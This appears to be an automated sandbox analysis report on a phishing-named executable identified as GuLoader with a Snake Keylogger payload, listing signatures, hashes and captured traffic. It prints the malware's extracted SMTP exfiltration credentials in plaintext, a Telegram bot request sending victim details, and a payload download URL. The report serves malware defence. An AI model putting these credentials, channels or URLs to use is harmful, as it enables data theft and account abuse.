Windows Analysis Report
PayeeAdvice_HK54912_R0038704_37504.exe

Overview

General Information

Sample name: PayeeAdvice_HK54912_R0038704_37504.exe
Analysis ID: 1559227
MD5: 62134cc34c58682721cb5bd2a9ba3624
SHA1: a650b3507161f8d705b183db6a965307d95625f4
SHA256: 6d7f0587ad61a77009ec4d739d3ffd3f74e0ab8a572913812bef6b8c2b89ea54
Tags: exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: PayeeAdvice_HK54912_R0038704_37504.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: PayeeAdvice_HK54912_R0038704_37504.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C487A8 CryptUnprotectData, 2_2_36C487A8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C48EF1 CryptUnprotectData, 2_2_36C48EF1
Uses 32bit PE files
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00402868 FindFirstFileW, 2_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004065DA FindFirstFileW,FindClose, 2_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 2_2_004059A9
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 0011F45Dh 2_2_0011F2C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 0011F45Dh 2_2_0011F4AC
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 0011FC19h 2_2_0011F960
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A531E0h 2_2_36A52DC8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A52C19h 2_2_36A52968
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5E959h 2_2_36A5E6B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5E0A9h 2_2_36A5DE00
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 2_2_36A50673
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5E501h 2_2_36A5E258
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5F661h 2_2_36A5F3B8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5EDB1h 2_2_36A5EB08
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5F209h 2_2_36A5EF60
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5CF49h 2_2_36A5CCA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5D3A1h 2_2_36A5D0F8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5FAB9h 2_2_36A5F810
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 2_2_36A50040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 2_2_36A50853
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5DC51h 2_2_36A5D9A8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A531E0h 2_2_36A5310E
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36A5D7F9h 2_2_36A5D550
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C49280h 2_2_36C48FB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C47EB5h 2_2_36C47B78
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4D5D6h 2_2_36C4D308
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C432B1h 2_2_36C43008
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C47571h 2_2_36C472C8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C45179h 2_2_36C44ED0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4F5C6h 2_2_36C4F2F8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C42151h 2_2_36C41EA8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C41CF9h 2_2_36C41A50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4F136h 2_2_36C4EE68
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C47119h 2_2_36C46E70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C44D21h 2_2_36C44A78
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4D146h 2_2_36C4CE78
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C46CC1h 2_2_36C46A18
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C448C9h 2_2_36C44620
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C45E81h 2_2_36C45BD8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C45A29h 2_2_36C45780
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4FA56h 2_2_36C4F788
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4DA66h 2_2_36C4D798
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4BA76h 2_2_36C4B7A8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C42E59h 2_2_36C42BB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C42A01h 2_2_36C42758
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C425A9h 2_2_36C42300
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4B5E6h 2_2_36C4B318
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C479C9h 2_2_36C47720
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C455D1h 2_2_36C45328
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4C396h 2_2_36C4C0C8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C40B99h 2_2_36C408F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C46733h 2_2_36C46488
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then mov esp, ebp 2_2_36C4B08B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C40741h 2_2_36C40498
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4E386h 2_2_36C4E0B8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C402E9h 2_2_36C40040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C43709h 2_2_36C43460
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4DEF6h 2_2_36C4DC28
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C462D9h 2_2_36C46030
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4BF06h 2_2_36C4BC38
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then mov esp, ebp 2_2_36C4B1C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4ECA6h 2_2_36C4E9D8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4CCB6h 2_2_36C4C9E8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C418A1h 2_2_36C415F8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C41449h 2_2_36C411A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4E816h 2_2_36C4E548
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C40FF1h 2_2_36C40D48
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36C4C826h 2_2_36C4C558
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB6970h 2_2_36CB6678
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBE5C0h 2_2_36CBE2C8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB3996h 2_2_36CB36C8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB079Eh 2_2_36CB04D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB77C8h 2_2_36CB74D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBCDD8h 2_2_36CBCAE0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBB5F0h 2_2_36CBB2F8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBBF80h 2_2_36CBBC88
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB2756h 2_2_36CB2488
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB154Eh 2_2_36CB1280
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBA798h 2_2_36CBA4A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB5986h 2_2_36CB56B8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB8FB0h 2_2_36CB8CB8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBFDA8h 2_2_36CBFAB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB9940h 2_2_36CB9648
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB030Eh 2_2_36CB0040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBEF50h 2_2_36CBEC58
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB8158h 2_2_36CB7E60
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB4746h 2_2_36CB4478
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBD768h 2_2_36CBD470
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB7300h 2_2_36CB7008
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBE0F8h 2_2_36CBDE00
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBC910h 2_2_36CBC618
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB54F6h 2_2_36CB5228
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB3506h 2_2_36CB3238
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBB128h 2_2_36CBAE30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBBAB8h 2_2_36CBB7C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB6347h 2_2_36CB5FD8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBA2D0h 2_2_36CB9FD8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB42B6h 2_2_36CB3FE8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBF8E0h 2_2_36CBF5E8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB22C6h 2_2_36CB1FF8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB10BEh 2_2_36CB0DF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB8AE8h 2_2_36CB87F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB9478h 2_2_36CB9180
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB5066h 2_2_36CB4D98
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB7C90h 2_2_36CB7998
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBEA88h 2_2_36CBE790
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBD2A0h 2_2_36CBCFA8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB3076h 2_2_36CB2DA8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB1E47h 2_2_36CB1BA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB5E16h 2_2_36CB5B48
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB6E38h 2_2_36CB6B40
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB3E26h 2_2_36CB3B58
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBC448h 2_2_36CBC150
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBAC60h 2_2_36CBA968
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB0C2Eh 2_2_36CB0960
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB4BD7h 2_2_36CB4908
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB2BE6h 2_2_36CB2918
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB19DEh 2_2_36CB1710
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB9E08h 2_2_36CB9B10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CB8620h 2_2_36CB8328
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBF418h 2_2_36CBF120
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CBDC30h 2_2_36CBD938
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF1FE8h 2_2_36CF1CF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF1190h 2_2_36CF0E98
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF0338h 2_2_36CF0040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF1B20h 2_2_36CF1828
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF0CC8h 2_2_36CF09D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF1658h 2_2_36CF1360
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then jmp 36CF0801h 2_2_36CF0508
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 2_2_36D33E70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 2_2_36D33E60
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 2_2_36D30D26
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 2_2_36D30A10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 2_2_36D309E1

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49756 -> 37.27.123.72:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2020/11/2024%20/%2019:18:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.107.43.12 13.107.43.12
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 188.114.96.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:49756 -> 37.27.123.72:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /y4mO9x8ZxntK8YWdNZ0APFyw4ftQiKEA3b9ah1Wz-M1CglBAT974LE8XumXkuL0QoN-7vR_btDJUwSahkUS2M93xLAAR6xUxBf6NEExd3XZo57-YMEfTx94x1QxOp2a-8hq__KMNGGaakccwQ1sWJGhyaRsLbTLnjBQxVFJ7n1h5l7q4yyhOY91F-AdnfAux6c4nzAxrfVrEgoQU3Nn3oITjw/KwTCIrYgMbvy217.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: 4jjxew.dm.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
